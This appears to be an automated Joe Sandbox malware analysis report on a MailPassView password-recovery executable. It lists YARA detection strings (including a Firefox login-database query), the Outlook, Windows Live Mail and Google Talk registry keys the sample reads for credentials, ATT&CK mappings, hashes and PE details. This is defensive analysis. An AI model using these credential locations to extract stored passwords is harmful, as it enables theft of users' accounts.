Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe

Overview

General Information

Sample name:SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
Analysis ID:1446234
MD5:a878dd0345c3721d93791ab68fcc1faf
SHA1:4982b21603e872f148b8ff1f9336dbd448d6abb5
SHA256:8458cddbadb39ca77e624b8dc5f28db74d14b03f0e573bb97dce2ebd5f2e6f05
Tags:exe
Infos:

Detection

MailPassView
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected MailPassView
Machine Learning detection for sample
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
    • 0x131b0:$a1: logins.json
    • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
    • 0x13934:$s4: \mozsqlite3.dll
    • 0x121a4:$s5: SMTP Password

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000000.00000000.1536326687.0000000000413000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        00000000.00000002.2791709876.00000000005EB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          Process Memory Space: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe PID: 5320JoeSecurity_MailPassViewYara detected MailPassViewJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
              • 0x131b0:$a1: logins.json
              • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
              • 0x13934:$s4: \mozsqlite3.dll
              • 0x121a4:$s5: SMTP Password
              0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
                • 0x131b0:$a1: logins.json
                • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
                • 0x13934:$s4: \mozsqlite3.dll
                • 0x121a4:$s5: SMTP Password

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeReversingLabs: Detection: 76%
                Machine Learning detection for sample
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeJoe Sandbox ML: detected
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,0_2_0040702D
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, 00000000.00000002.2791480565.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeString found in binary or memory: http://www.nirsoft.net/
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_0040ADA4 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,0_2_0040ADA4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00406073 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00406073
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00405FD0 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,0_2_00405FD0

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, type: SAMPLEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00404DE50_2_00404DE5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00404E560_2_00404E56
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00404EC70_2_00404EC7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00404F580_2_00404F58
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_0040BF6B0_2_0040BF6B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: String function: 00412084 appears 39 times
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, type: SAMPLEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                Source: classification engineClassification label: mal80.phis.spyw.winEXE@1/0@0/0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_0040F37C FindResourceA,SizeofResource,LoadResource,LockResource,0_2_0040F37C
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeReversingLabs: Detection: 76%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeFile opened: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.cfgJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_CURSOR
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_BITMAP
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_ICON
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_MENU
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_DIALOG
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_STRING
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_ACCELERATOR
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: section name: RT_GROUP_ICON
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00403C17 LoadLibraryA,GetProcAddress,strcpy,0_2_00403C17
                Source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeStatic PE information: real checksum: 0x20c22 should be: 0x1c68c
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00412341 push ecx; ret 0_2_00412351
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00412360 push eax; ret 0_2_00412374
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00412360 push eax; ret 0_2_0041239C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_0040FCBC memset,strcpy,memset,strcpy,strcat,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040FCBC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeWindow / User API: foregroundWindowGot 367Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,0_2_0040702D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00403C17 LoadLibraryA,GetProcAddress,strcpy,0_2_00403C17
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,0_2_004073B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: 0_2_00406282 GetVersionExA,0_2_00406282

                Stealing of Sensitive Information

                barindex
                Yara detected MailPassView
                Source: Yara matchFile source: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1536326687.0000000000413000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2791709876.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe PID: 5320, type: MEMORYSTR
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword0_2_00402D74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword0_2_00402D74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exeCode function: ESMTPPassword0_2_004033B1

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		2
                Credentials in Registry                		1
                Application Window Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
                Obfuscated Files or Information                		1
                Credentials In Files                		1
                Account Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		Junk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                DLL Side-Loading                		Security Account Manager1
                System Owner/User Discovery                		SMB/Windows Admin Shares2
                Clipboard Data                		SteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets3
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe76%ReversingLabsWin32.Hacktool.MailPassView
                SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.nirsoft.netSecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe, 00000000.00000002.2791480565.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.net/SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exefalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1446234
                Start date and time:2024-05-23 01:30:17 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 23s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
                Detection:MAL
                Classification:mal80.phis.spyw.winEXE@1/0@0/0
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 39
                • Number of non-executed functions: 134
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • VT rate limit hit for: SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.292490303895851
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.83%
                • Windows Screen Saver (13104/52) 0.13%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
                File size:102'400 bytes
                MD5:a878dd0345c3721d93791ab68fcc1faf
                SHA1:4982b21603e872f148b8ff1f9336dbd448d6abb5
                SHA256:8458cddbadb39ca77e624b8dc5f28db74d14b03f0e573bb97dce2ebd5f2e6f05
                SHA512:12900cd5dbf9e3627abc5496e288b8e3c6ef4859c716734382dcc29e819707a46f1b4bc7c569f5d8fff56c6655be0e6930d6926f97f9fa4ec7ccca864876321d
                SSDEEP:1536:dkSw2tYZT/E7mKr1awGUpi2joqDm1WHUZ1Kj4I9eF/6n9w2KQf:dk52tYtEyKB5GUDlDdccMU9w2KQf
                TLSH:2EA36C03B2905472E5EE063179662FB5DAF9BE311A349E0BD7A05D0B3DB06C4EE21397
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qq..Qq..Qq...~..Cq...R..Rq...R..Zq..Qq..[p...R..Rq..v...vq..v...Pq..v...Pq..RichQq..................PE..L.....oW...........

                File Icon

                Icon Hash:231323c2b0bac892

                Static PE Info

                General

                Entrypoint:0x41211a
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x576FA4D7 [Sun Jun 26 09:48:07 2016 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f62295e96de1ceba9dea2c107634303d

                Entrypoint Preview

                Instruction
                push 00000070h
                push 004133E0h
                call 00007F8FA15A4607h
                xor ebx, ebx
                push ebx
                mov edi, dword ptr [00413068h]
                call edi
                cmp word ptr [eax], 5A4Dh
                jne 00007F8FA15A4441h
                mov ecx, dword ptr [eax+3Ch]
                add ecx, eax
                cmp dword ptr [ecx], 00004550h
                jne 00007F8FA15A4434h
                movzx eax, word ptr [ecx+18h]
                cmp eax, 0000010Bh
                je 00007F8FA15A4441h
                cmp eax, 0000020Bh
                je 00007F8FA15A4427h
                mov dword ptr [ebp-1Ch], ebx
                jmp 00007F8FA15A4449h
                cmp dword ptr [ecx+00000084h], 0Eh
                jbe 00007F8FA15A4414h
                xor eax, eax
                cmp dword ptr [ecx+000000F8h], ebx
                jmp 00007F8FA15A4430h
                cmp dword ptr [ecx+74h], 0Eh
                jbe 00007F8FA15A4404h
                xor eax, eax
                cmp dword ptr [ecx+000000E8h], ebx
                setne al
                mov dword ptr [ebp-1Ch], eax
                mov dword ptr [ebp-04h], ebx
                push 00000002h
                call dword ptr [00413374h]
                pop ecx
                or dword ptr [00418B6Ch], FFFFFFFFh
                or dword ptr [00418B70h], FFFFFFFFh
                call dword ptr [00413370h]
                mov ecx, dword ptr [00417B8Ch]
                mov dword ptr [eax], ecx
                call dword ptr [0041336Ch]
                mov ecx, dword ptr [00417B88h]
                mov dword ptr [eax], ecx
                mov eax, dword ptr [0041333Ch]
                mov eax, dword ptr [eax]
                mov dword ptr [00418B68h], eax
                call 00007F8FA15A455Fh
                cmp dword ptr [00417000h], ebx
                jne 00007F8FA15A442Eh
                push 00412304h
                call dword ptr [00413380h]
                pop ecx
                call 00007F8FA15A4534h

                Rich Headers

                Programming Language:
                • [RES] VS2005 build 50727
                • [LNK] VS2005 build 50727

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1562c0xdc.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x2ec4.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x133c00x1c.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x130000x398.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x114440x11600075a4752015d3334d0e8004026c943e9False0.5987100944244604data6.423545208891307IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x130000x38960x3a00c7abfcb7a14066602a9e29aaaceb2ab9False0.4829606681034483data5.677342764808712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x170000x1b740xc0032fceda92d9d037d5e69161d18111910False0.3046875data2.6959048209292744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
